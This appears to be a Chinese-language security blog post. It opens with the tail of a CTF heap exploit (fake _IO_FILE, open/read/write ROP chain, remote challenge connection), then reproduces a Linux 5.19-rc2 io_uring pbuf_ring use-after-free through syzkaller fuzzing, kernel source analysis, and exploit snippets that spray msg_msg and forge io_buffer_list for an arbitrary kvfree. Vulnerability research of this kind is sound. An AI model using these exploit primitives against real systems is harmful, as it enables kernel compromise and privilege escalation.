fake_IO_FILE += p64(_IO_stdfile_2_lock) # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90, '\x00')
fake_IO_FILE += p64(fake_io_addr+0x30+0x10)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, '\x00')
fake_IO_FILE += p64(0) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, '\x00')
fake_IO_FILE += p64(IO_wfile_jumps+0x10) # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x30+0x20) # rax2_addr

chain = p64(ORW_addr)
# open(heap_addr,0)
chain += p64(pop_rax_ret) + p64(2)
chain += p64(pop_rdi_ret) + p64(flag_addr)
chain += p64(pop_rsi_ret) + p64(0)
chain += p64(pop_rdx_ret) + p64(0)
chain += p64(syscall_ret)
# read(3,heap_addr,0x60)
chain += p64(pop_rax_ret) + p64(0)
chain += p64(pop_rdi_ret) + p64(3)
chain += p64(pop_rsi_ret) + p64(flag_addr)
chain += p64(pop_rdx_ret) + p64(0x60)
chain += p64(syscall_ret)
# write(1,heap_addr,0x60)
chain += p64(pop_rax_ret) + p64(1)
chain += p64(pop_rdi_ret) + p64(1)
chain += p64(pop_rsi_ret) + p64(flag_addr)
chain += p64(pop_rdx_ret) + p64(0x60)
chain += p64(syscall_ret)

chain = chain.ljust(0x200,'\x00')
chain += './flag\x00'

sleep(0.2)
add(0x800,0x208*'p'+p64(0x431)) #11
add(0xa30,0x38*"k"+p64(0xa01)) # padding-不要破坏原来的chunk结构
#add(0x1240,0x208*'k'+p64(0x431)+0x428*'a'+p64(0x211)+0x208*'a'+p64(0xa01)+"\n"*6) # padding-不要破坏原来的chunk结构
sleep(0.2)

dele(0)
sleep(0.2)
success("chain len >> "+hex(len(chain)))
add(0x440,chain+"\n"*5) # 0-chain
sleep(0.2)

add(0x418) #12
add(0x208) #13
dele(5)
dele(4)
dele(11)

sleep(0.2)
add(0x1240,0x208*'a'+p64(0x431)+p64(libc_base+0x21a0d0)*2+p64(heap+0x1350+0x52f0+0x10)+p64(stderr-0x20)+"\n"*6) #4
sleep(0.2)

dele(12)
add(0x500) # largebin attack
add(0x410)
dele(4)

sleep(0.2)
add(0x1240,0x208*'a'+p64(0x431)+p64(libc_base+0x21a0d0)*2+p64(heap+0x1350+0x52f0+0x10)*2+"\n"*6) #4
sleep(0.2)
payload = fake_IO_FILE+p64(flag_addr)

sleep(0.2)
success("payload len >> "+hex(len(payload)))
add(0x420,payload+"\n") #13
sleep(0.2)

add(0x9008)
add(0x9008)
add(0x5300)
add(0x108,"a"*0x108)
dele(1)
pause()
add(0x600)

while True:
sleep(1)
local = 0
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('120.24.69.11','12700')

try:
pwn()
ru("{")
p.interactive()
except:
p.close()

io_uring 模块 pbuf_ring 漏洞

本篇博客主要对以下文章的内容进行复现:

1
2
/ $ uname -r
5.19.0-rc2
1
2
3
4
5
6
7
8
9
10
qemu-system-x86_64 \
-m 512M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 panic=-1 pti=on nokaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=4 -s
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -t devpts devpts /dev/pts

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

内核源码下载:https://src.fedoraproject.org/repo/pkgs/kernel/linux-5.19-rc2.tar.xz/

  • 该漏洞已经在 5.19-rc8 中被修复
  • 在编译内核前需要先将修复的部分还原
  • 内核编译选项如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
CONFIG_KCOV=y        
CONFIG_VIRTIO_NET=y
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y

# 可选
CONFIG_DEBUG_INFO=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y

# 关闭
# CONFIG_SLAB_FREELIST_RANDOM is not set
# CONFIG_SLAB_FREELIST_HARDENED is not set

io_uring 模块的使用

IO uring(Unified Resource Gestion)是一个 Linux 内核功能,它允许异步 I/O 操作,从而提高系统性能

  • io_uring 的使用案例包括文件读写、网络通信、数据库连接等
  • io_uring 通过使用用户空间和内核之间的通信机制,允许用户空间应用程序在异步 I/O 操作完成后立即获取结果,而无需等待内核完成磁盘操作或其他内核操作

io_uring 的实现仅仅使用了三个 syscall:

  • io_uring_setup:设置 io_uring 上下文
  • io_uring_enter:提交并获取完成任务
  • io_uring_register:注册内核用户共享的缓冲区

基于共享内存,io_uring 维护了两个与内核共享的队列:

  • submit 队列:用于存储待提交的 I/O 请求
  • completion 队列:用于存储 I/O 请求的完成状态

submit 队列中的 I/O 请求与 completion 队列中的 I/O 完成事件之间也没有固定的对应关系,内核会根据 I/O 请求的类型、文件描述符、线程池等信息自动将 I/O 请求分配到合适的队列中

  • 由于 submit / completion 队列属于用户态程序与内核的共享空间
  • 内核只需要读取 submit 队列中的参数就可以执行相应的内核态函数,不需要执行系统调用
  • 当数据执行完毕时,内核又会将返回数据写入 completion 队列

使用案例如下:(文件读写)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
// gcc -o io_uring io_uring.c -luring -fno-stack-protector -no-pie -g
#include <fcntl.h>
#include <io_uring.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 1024

int main() {
char *filename = "test.txt";
char *buf = malloc(BUF_SIZE);
struct io_uring_params params;
struct io_uring *ring;
int ret;

memset(&params, 0, sizeof(params));
params.sq_entries = 1;
params.cq_entries = 1;
params.flags = IORING_FLAG_NONBLOCK;

ret = io_uring_setup(&params, &ring); /* 初始化io_uring */
if (ret < 0) {
perror("io_uring_setup");
return 1;
}

ret = io_uring_register_files(ring, 1, &filename[0]); /* 打开一个文件 */
if (ret < 0) {
perror("io_uring_register_files");
return 1;
}

struct io_uring_sqe sqe = {0};
sqe.op = IORING_OP_READ; /* io_uring命令 */
sqe.fd = 0; /* io_uring文件描述符 */
sqe.off = 0; /* 偏移 */
sqe.addr = buf; /* 读取地址 */
sqe.len = BUF_SIZE; /* 长度 */

ret = io_uring_submit_sqe(ring, &sqe); /* 底层使用io_uring_enter系统调用 */
if (ret < 0) {
perror("io_uring_submit_sqe");
return 1;
}

struct io_uring_cqe cqe;
while (1) {
ret = io_uring_peek_cqe(ring, &cqe);
if (ret == -1) {
if (errno == EAGAIN) {
continue;
}
perror("io_uring_peek_cqe");
return 1;
}

if (cqe.err < 0) {
fprintf(stderr, "read: %s\n", strerror(cqe.err));
break;
}

printf("%s", buf);
break;
}

io_uring_cancel(ring, 0);
io_uring_queue_exit(ring);
free(buf);
return 0;
}

syzkaller 的安装与使用

syzkaller 是一个用于自动生成内核错误测试用例的 fuzz 工具,它通过利用目标内核的漏洞来生成测试用例,这些测试用例可以用于测试内核的安全性

syzkaller 的主要功能包括自动生成、测试和报告内核错误

syzkaller 使用 Go 语言编写,因此需要获取 go 语言的 tool chain(经过测试,现在最新版的 syzkaller 需要 1.19 版本的 go 环境)

1
2
3
4
wget -c https://dl.google.com/go/go1.19.2.linux-amd64.tar.gz
tar -xf go1.19.2.linux-amd64.tar.gz
sudo cp go/bin/go /usr/local/bin
sudo cp -r go /usr/local

安装 syzkaller:

1
2
3
git clone https://github.com/google/syzkaller
cd syzkaller
make

编译完成后,在 syzkaller 目录下会出现一个 bin 目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
bin
├── linux_amd64
│   ├── syz-execprog
│   ├── syz-executor
│   ├── syz-fuzzer
│   └── syz-stress
├── syz-db
├── syz-manager
├── syz-mutate
├── syz-prog2c
├── syz-repro
├── syz-runtest
├── syz-sysgen
└── syz-upgrade
  • 如果 syzkaller/bin 目录下,没有 syz-extractsyz-sysgen 这两个文件的话,需要执行如下命令编译:
1
2
make bin/syz-extract
make bin/syz-sysgen

使用 syzkaller 前,先新建一个 workdir 目录,并新建一个 config 文件用于配置运行所需参数(命名为 test.cfg)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"target": "linux/amd64",
"http": "127.0.0.1:56741",
"rpc": "127.0.0.1:0",
"sshkey" : "/home/yhellow/pwntest/image/bullseye.id_rsa", /* ssh key */
"workdir": "/home/yhellow/pwntest/workdir", /* 本地工作目录 */
"kernel_obj": "/home/yhellow/pwntest/code/linux-5.19-rc2", /* 内核源码位置 */
"syzkaller": "/home/yhellow/Tools/syzkaller", /* syzkaller工具目录 */
"sandbox": "setuid",
"type": "isolated",
"vm": {
"targets" : [ "127.0.0.1:10021" ], /* 虚拟机ip:10021 */
"pstore": false,
"target_dir" : "/root/fuzzdir", /* 虚拟机工作目录 */
"target_reboot" : false
}
}

在开始 fuzz 之前需要先配置 Imgage 镜像

首先安装 debootstrap,它是 linux 下用来构建一套基本根文件系统的工具:

1
sudo apt-get install debootstrap

之后在 linux 项目目录下键入以下命令,以创建 Debian Stretch Linux image:

1
2
3
wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh
chmod +x create-image.sh
./create-image.sh

上述操作全部完成后,执行以下命令来尝试启动:

1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 2G \
-smp 2 \
-kernel ./bzImage \
-append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \
-drive file=./image/bullseye.img,format=raw \
-net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
-net nic,model=e1000 \
-enable-kvm \
-nographic \
-pidfile vm.pid 2>&1 | tee vm.log

然后测试 ssh 能否成功工作,因为 syzkaller 会用到 ssh:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  pwntest ssh -i ./image/bullseye.id_rsa -p 10021 -o "StrictHostKeyChecking no" root@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:jAtZl0868l4KSK75H0o0bE+7bXydTB4iDwkp68qT2Dk.
Please contact your system administrator.
Add correct host key in /home/yhellow/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/yhellow/.ssh/known_hosts:1
remove with:
ssh-keygen -f "/home/yhellow/.ssh/known_hosts" -R "[localhost]:10021"
Password authentication is disabled to avoid man-in-the-middle attacks.
Keyboard-interactive authentication is disabled to avoid man-in-the-middle attacks.
Linux syzkaller 5.19.2 #10 SMP PREEMPT_DYNAMIC Thu Dec 7 02:17:49 CST 2023 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
A valid context for root could not be obtained.
Last login: Wed Dec 6 18:22:26 2023
root@syzkaller:~#

如果遇到以下报错可以参考如下的解决方案:

1
kex_exchange_identification: read: Connection reset by peer

先启动内核,后启动 fuzz:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
➜  pwntest /home/yhellow/Tools/syzkaller/bin/syz-manager -config=test.cfg
2023/12/07 02:53:47 loading corpus...
2023/12/07 02:53:47 serving http on http://127.0.0.1:56741
2023/12/07 02:53:47 serving rpc on tcp://127.0.0.1:39647
2023/12/07 02:53:47 booting test machines...
2023/12/07 02:53:47 wait for the connection from test machine...
2023/12/07 02:54:01 machine check:
2023/12/07 02:54:01 syscalls : 2123/4451
2023/12/07 02:54:01 code coverage : enabled
2023/12/07 02:54:01 comparison tracing : CONFIG_KCOV_ENABLE_COMPARISONS is not enabled
2023/12/07 02:54:01 extra coverage : enabled
2023/12/07 02:54:01 delay kcov mmap : enabled
2023/12/07 02:54:01 setuid sandbox : enabled
2023/12/07 02:54:01 namespace sandbox : enabled
2023/12/07 02:54:01 Android sandbox : enabled
2023/12/07 02:54:01 fault injection : CONFIG_FAULT_INJECTION is not enabled
2023/12/07 02:54:01 leak checking : CONFIG_DEBUG_KMEMLEAK is not enabled
2023/12/07 02:54:01 net packet injection : /dev/net/tun does not exist
2023/12/07 02:54:01 net device setup : enabled
2023/12/07 02:54:01 concurrency sanitizer : /sys/kernel/debug/kcsan does not exist
2023/12/07 02:54:01 devlink PCI setup : PCI device 0000:00:10.0 is not available
2023/12/07 02:54:01 NIC VF setup : PCI device 0000:00:11.0 is not available
2023/12/07 02:54:01 USB emulation : /dev/raw-gadget does not exist
2023/12/07 02:54:01 hci packet injection : /dev/vhci does not exist
2023/12/07 02:54:01 wifi device emulation : /sys/class/mac80211_hwsim/ does not exist
2023/12/07 02:54:01 802.15.4 emulation : /sys/bus/platform/devices/mac802154_hwsim does not exist
2023/12/07 02:54:01 swap file : enabled
2023/12/07 02:54:01 corpus : 179 (deleted 0 broken)

开始 fuzz 后,在 http://127.0.0.1:56741/ 可以查看详细信息:

1701887988901

syscall description 的编写

syzkaller 自己定义了一套描述系统调用模版的声明式语言 syzlang

  • 为了提高 fuzz 效率,我们必须为目标系统量身定制这种声明文件
  • 通常一个设备节点对应一个声明文件
  • 所谓的声明文件就是一个 txt,根据 syzkaller 定义的语法,在这个 txt 文档中描述设备节点的接口信息以及参数格式

整个定制过程分为4步:

  1. 根据目标内核模块的信息,撰写符合 syzlang 语法的 txt 声明文件
  2. syz-extract 根据 txt 及 linux 源码,提取符号常量的值,生成中间文件(.const 文件)
  3. syz-sysgen 根据 const 文件生成 syzkaller 执行时使用的 go 文件
  4. 重新编译 syzkaller

使用如下命令编译自定义模块:

1
bin/syz-extract -os linux -arch amd64 -sourcedir "/home/yhellow/pwntest/code/linux-5.19.2" test.txt

编译完成后运行 syz-sysgen,然后重新编译 syzkaller:

1
2
3
bin/syz-sysgen
make generate
make
  • 该步骤将更新 /syzkaller/sys/linux/gen/amd64.go,自动添加上新定义的系统调用

syzkaller 源码中的 /syzkaller/sys/linux 目录下专门记录有各个常用模块的 syzlang 文档(已经编译完成),本实验我们需要使用 io_uring.txt

为了提高 fuzz 效率,增加了 “enable_syscalls” 项,只允许某些系统调用,能更快地触发漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
"target": "linux/amd64",
"http": "127.0.0.1:56741",
"rpc": "127.0.0.1:0",
"sshkey" : "/home/yhellow/pwntest/image/bullseye.id_rsa",
"workdir": "/home/yhellow/pwntest/workdir",
"kernel_obj": "/home/yhellow/pwntest/code/linux-5.19-rc2",
"syzkaller": "/home/yhellow/Tools/syzkaller",
"sandbox": "setuid",
"type": "isolated",
"enable_syscalls":[
"io_uring_register$IORING_REGISTER_PBUF_RING", /* 漏洞所在模块 */
"io_uring_setup"
],
"vm": {
"targets" : [ "127.0.0.1:10021" ],
"pstore": false,
"target_dir" : "/root/fuzzdir",
"target_reboot" : false
}
}

分析 crash 文件

所有 fuzz 出的 crash 信息都存储在 /workdir/crashes

当 syzkaller fuzz 遇到 crash 后会尝试复现该 crash:(并不是每一次都能成功)

1701933275474

当 syzkaller 成功复现 crash 时,会出现如下信息:

1701933554055

  • PS:有时候复现的 C 代码特别奇怪,也不能触发 crash,不能完全采信

漏洞分析

分析核心系统调用 syscall(__NR_io_uring_register) 对应的内核源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

/*
* We're inside the ring mutex, if the ref is already dying, then
* someone else killed the ctx or is already going through
* io_uring_register().
*/
if (percpu_ref_is_dying(&ctx->refs))
return -ENXIO;

if (ctx->restricted) {
if (opcode >= IORING_REGISTER_LAST)
return -EINVAL;
opcode = array_index_nospec(opcode, IORING_REGISTER_LAST);
if (!test_bit(opcode, ctx->restrictions.register_op))
return -EACCES;
}

switch (opcode) {
......
case IORING_REGISTER_PBUF_RING:
ret = -EINVAL;
if (!arg || nr_args != 1)
break;
ret = io_register_pbuf_ring(ctx, arg); /* 漏洞函数 */
break;
......
default:
ret = -EINVAL;
break;
}

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
static int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_ring *br;
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;
struct page **pages;
int nr_pages;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

if (reg.pad || reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) { /* 为io uring context分配io buffer list对象数组 */
int ret = io_init_bl_list(ctx); /* 这里分配了ctx->io_bl[64] */
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid); /* 根据提供的buffer group id找到对应的缓冲区链表 */
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->buf_nr_pages || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

pages = io_pin_pages(reg.ring_addr,
struct_size(br, bufs, reg.ring_entries),
&nr_pages); /* 分配FOLL_PIN的页 */
if (IS_ERR(pages)) {
kfree(bl);
return PTR_ERR(pages);
}

br = page_address(pages[0]); /* buffer ring所在地址 */
bl->buf_pages = pages;
bl->buf_nr_pages = nr_pages;
bl->nr_entries = reg.ring_entries;
bl->buf_ring = br;
bl->mask = reg.ring_entries - 1;
io_buffer_add_list(ctx, bl, reg.bgid); /* 设置bl->bgid=reg.bgid,并将其添加到ctx的XArray中 */
return 0;
}
  • 首先检查传入的参数,并在 io_uring_context 中分配 io_buffer_list 对象数组 ctx->io_bl
  • 然后根据参数中的缓冲区组ID找到对应的 io_buffer_list 对象
  • 然后调用 io_pin_pages 尝试根据用户给定的地址和长度分配 FOLL_PIN 的页
  • 如果分配分配失败,就直接释放掉 io_buffer_list 对象(变量 bl 指向的是对象数组中的一项,不能单独释放,因而触发报错)

变量 bl=&ctx->io_bl[bgid],如果 bgid=0,就可以释放整个 ctx->io_bl(不会触发报错),但是释放之后并没有清除 ctx->io_bl,后续使用就会造成 UAF

  • PS:从后续修复的代码来看,设计者可能只是想释放由 kzalloc(sizeof(*bl), GFP_KERNEL) 申请的内存,但是没有考虑周全

入侵思路

有 UAF 的对象大小为 0x800(使用 kmalloc-2k),可以尝试利用 msg_msg 占用 UAF 堆块,然后利用 io_provide_buffers() 在链表 ctx->io_bl[0].buf_list 上添加一个 io_buffer 对象

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
   init_io_uring();

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msgid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

do_free_first();

puts("try to get UAF object");

struct msgbuf* msg = (struct msgbuf*)buffer;
int msg_len = 0x420 - 0x30;
msg->mtype = 0x0001;
memset(msg->mtext, '\x00', msg_len);
msgsnd(msgid[0], msg, msg_len, 0);

/* 将io_buffer链接到ctx->io_bl[0],伪造一个msg_msg对象 */
void* pbuf = do_mmap(PBUF_BASE, PAGE_SIZE);
sqes->opcode = IORING_OP_PROVIDE_BUFFERS;
sqes->rw_flags = 0;
sqes->splice_fd_in = 0;
sqes->fd = 1;
sqes->addr = pbuf; // io_buffer->addr对应msg_msg->m_type
sqes->len = 0xFD0; // io_buffer->len对应msg_msg->m_ts
sqes->buf_group = 0; // 链接到ctx->io_bl[buf_group](这里'0'对应msg_msg的头部, 可以伪造msg_msg)
submit_provide_buffer();

/* 从ctx->io_buffer_cache中分配两对象,获取指向ctx->io_bl[33]的指针,从而找到kmalloc-2k的地址 */
for (int i = 0; i < 0x2; i++) {
sqes->addr = malloc(0x100);
sqes->len = 0x100;
sqes->buf_group = 0x21; /* 0x420后面的都是可用的io_buffer_list(没有被msg_msg覆盖),因此链接到0x420这个位置(0x420/0x20=0x21) */
submit_provide_buffer();
}

puts("submit_provide_buffer");

uint64_t* tag = (uint64_t*)(buffer + 0xF00);
*tag = 0xdeadbeef;
pthread_t th;
pthread_create(&th, NULL, worker, buffer);

while (*tag == 0xdeadbeef) ;

正常状态下的 io_buffer_list

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:0000│ rdi rbp 0xffff8880059f6800 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff8880059f6800 ◂— 0xffff8880059f6800
02:00100xffff8880059f6810 ◂— 0x0
03:00180xffff8880059f6818 ◂— 0x0
04:00200xffff8880059f6820 ◂— 0xffff8880059f6820
05:00280xffff8880059f6828 —▸ 0xffff8880059f6820 ◂— 0xffff8880059f6820
06:00300xffff8880059f6830 ◂— 0x1
07:00380xffff8880059f6838 ◂— 0x0

msg_msg 覆盖后:

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:00000xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff8880059d56c0 —▸ 0xffff8880059f6800 ◂— 0xffff8880059d56c0
02:00100xffff8880059f6810 ◂— 0x1
03:00180xffff8880059f6818 ◂— 0x3f0
04:00200xffff8880059f6820 ◂— 0x0
05:00280xffff8880059f6828 —▸ 0xffff8880051ab548 ◂— 0x1
06:00300xffff8880059f6830 ◂— 0x0
07:00380xffff8880059f6838 ◂— 0x0
  • msg_msg 覆盖大小为 0x420,后续的 io_buffer_list 正常
1
2
3
4
5
6
7
pwndbg> telescope 0xffff8880059f6800+0x420
00:00000xffff8880059f6c20 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 ◂— 0xffff8880059f6c20
01:00080xffff8880059f6c28 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 ◂— 0x0
02:00100xffff8880059f6c30 ◂— 0x21 /* '!' */
03:00180xffff8880059f6c38 ◂— 0x0
04:00200xffff8880059f6c40 ◂— 0xffff8880059f6c40
05:00280xffff8880059f6c48 —▸ 0xffff8880059f6c40 ◂— 0xffff8880059f6c40

添加 io_buffer 对象后:

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:00000xffff8880059f6800 —▸ 0xffff8880059d56c0 —▸ 0xffff888005a16000 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff888005a16000 —▸ 0xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0x0
02:00100xffff8880059f6810 ◂— 0x1
03:00180xffff8880059f6818 ◂— 0x3f0
04:00200xffff8880059f6820 ◂— 0x0
05:00280xffff8880059f6828 —▸ 0xffff8880051ab548 ◂— 0x1
06:00300xffff8880059f6830 ◂— 0x0
07:00380xffff8880059f6838 ◂— 0x0
  • 对于 msg_msg 而言,程序会误以为 io_buffer 对象也是 msg_msg 结构体
  • 打印位于 ctx->io_buffer_cacheio_buffer 对象:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> telescope 0xffff888005a16000
/* 第1个io_buffer对象 */
00:00000xffff888005a16000 —▸ 0xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0xffff888005a16000
01:00080xffff888005a16008 —▸ 0xffff8880059d56c0 —▸ 0xffff888005a16000 —▸ 0xffff8880059f6800 ◂— 0x0
02:00100xffff888005a16010 —▸ 0x1000 (cpu_debug_store) ◂— 0x0
03:00180xffff888005a16018 ◂— 0xfd0
/* 第2个io_buffer对象 */
04:00200xffff888005a16020 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 ◂— 0xffff888005a16020
05:00280xffff888005a16028 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 ◂— 0x0
06:00300xffff888005a16030 —▸ 0x1bd2b80 ◂— 0x0
07:00380xffff888005a16038 ◂— 0x21000000000100
/* 第3个io_buffer对象 */
08:00400xffff888005a16040 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 ◂— 0xffff888005a16040
09:00480xffff888005a16048 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 ◂— 0x0
0a:00500xffff888005a16050 —▸ 0x1bd2c90 ◂— 0x0
0b:00580xffff888005a16058 ◂— 0x21000000000100
  • 新添加的第2,3个 io_buffer 对象都会链接到 ctx->io_bl[33] 构成循环链表,利用这一点可以泄露 ctx->io_bl 的地址(UAF 对象的地址)

接下来我想尝试正常释放 ctx->io_bl 并用其他内核结构体占位,但不管是 io_unregister_pbuf_ring 还是 io_destroy_buffers 都会因为 io_buffer_list 的结构被破坏而执行失败

这里文章采用的利用思路是:

  • 利用 msg_msg 伪造 io_buffer_list 对象
  • 然后通过 kvfree(bl->buf_pages) 获取 kmalloc-2k 上的任意地址 free
  • 构造对象重叠以备后续利用

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
    msg_len = 0x800 - 0x30;
memset(msg->mtext, 0x00, msg_len);
msgsnd(msgid[2], msg, msg_len, 0); /* 创建new msg_msg */

int spray_uring_fd;
struct io_uring_params p;
memset(&p, 0, sizeof(p));
spray_uring_fd = io_uring_setup(0x1, &p); /* 创建io_ring_ctx */
/* ps:由于没有开启slub随机化,UAF msg_msg,new msg_msg,io_ring_ctx,三者相邻 */

ret = msgrcv(msgid[0], buffer, PAGE_SIZE, (long)0x0001, 0); /* 释放UAF msg_msg */

#define IDX(x) (((x)-0x30) / 8)

uint64_t* tmp = (uint64_t*)msg->mtext; // 伪造io_buffer_list
tmp[IDX(0x40)] = io_bl + 0x60; // fake_bl.buf_pages
tmp[IDX(0x48)] = io_bl; // fake_bl.buf_ring(指向可读区域)
tmp[IDX(0x50)] = 0x10000; // fake_bl.buf_nr_pages = 1
tmp[IDX(0x60)] = io_bl + 0x68; // 被当做buf_pages[0]
tmp[IDX(0x68)] = 0xdeadbeef; // 被当做page对象

tmp[IDX(0x80)] = io_bl + 0xa0; // fake_bl.buf_pages
tmp[IDX(0x88)] = io_bl; // fake_bl.buf_ring(指向可读区域)
tmp[IDX(0x90)] = 0x10000; // fake_bl.buf_nr_pages = 1
tmp[IDX(0xa0)] = io_bl + 0x1000; // 被当做buf_pages[0]

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[1], msg, msg_len, 0); /* 重新申请UAF msg_msg */

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.bgid = 0x2;
ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, &reg, 1); /* 利用__io_remove_buffers()进行任意地址kvfree() */

打印 UAF 对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> telescope 0xffff888005a33800
00:00000xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
01:00080xffff888005a33808 —▸ 0xffff8880059e54c0 —▸ 0xffff888005a33800 ◂— 0xffff8880059e54c0
02:00100xffff888005a33810 ◂— 0x1
03:00180xffff888005a33818 ◂— 0x7d0
04:00200xffff888005a33820 ◂— 0x0
05:00280xffff888005a33828 —▸ 0xffff88800586a288 ◂— 0x1
06:00300xffff888005a33830 ◂— 0x0
07:00380xffff888005a33838 ◂— 0x0
08:00400xffff888005a33840 —▸ 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
09:00480xffff888005a33848 —▸ 0xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
0a:00500xffff888005a33850 ◂— 0x10000
0b:00580xffff888005a33858 ◂— 0x0
0c:00600xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
0d:00680xffff888005a33868 ◂— 0xdeadbeef
0e:00700xffff888005a33870 ◂— 0x0
0f:00780xffff888005a33878 ◂— 0x0
10:00800xffff888005a33880 —▸ 0xffff888005a338a0 —▸ 0xffff888005a34800 ◂— 0x607fe0c00e60
11:00880xffff888005a33888 —▸ 0xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
12:00900xffff888005a33890 ◂— 0x10000
13:00980xffff888005a33898 ◂— 0x0
